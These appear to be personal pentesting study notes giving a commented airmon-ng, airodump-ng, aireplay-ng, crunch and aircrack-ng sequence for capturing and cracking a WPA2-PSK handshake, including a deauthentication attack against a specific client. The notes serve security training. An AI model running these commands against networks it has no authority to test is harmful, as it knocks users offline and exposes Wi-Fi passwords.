-
Wireless Pentesting - assessment of a wireless network (WPA2 PSK or WPA2 Enterprise).
-
Activities performed:
- Evaluating strength of PSK
- Reviewing nearby networks
- Assessing guest networks
- Checking network access
-
Tools used - wireless card, router, laptop
-
Process (for WPA2 PSK):
-
Place wireless card into monitor mode
-
Discover info about network (channel, BSSID)
-
Select network & capture data
-
Perform deauth attack
-
Capture WPA handshake
-
Attempt to crack handshake
-
#connect wireless card to laptop
#ensure it is connected by checking wireless interfaces
iwconfig
#if it shows wlan0, it is connected
#it is currently in managed mode
#we need to place it in monitor mode
sudo airmon-ng check kill
#kill interfering processes
sudo airmon-ng start wlan0
#start monitor mode on interface
iwconfig
#wlan0mon is active
sudo airodump-ng wlan0mon
#search for networks
#stop it after identifying target network
sudo airodump-ng -c 11 --bssid 74:D2:1D:A4:82:5A -w capture wlan0mon
#-c for channel, --bssid for bssid
#-w for capture filename
#to capture handshake, we need to run deauth attack
#in new tab
sudo aireplay-ng -0 1 -a 74:D2:1D:A4:82:5A -c BC:6A:D1:81:5C:8B wlan0mon
#-a for access point, -c for station to deauth
#this helps in capturing handshake
ls
#we have capture files now
#we can generate wordlist using crunch
crunch 8 8 -t %@aaaa@% -o samplewordlist.txt
#8 letter password
#% for numbers and @ for lowercase chars
#to crack handshake
aircrack-ng -w samplewordlist.txt -b 74:D2:1D:A4:82:5A capture-01.cap
#-b for access point MAC address
#.cap file contains the handshake to be cracked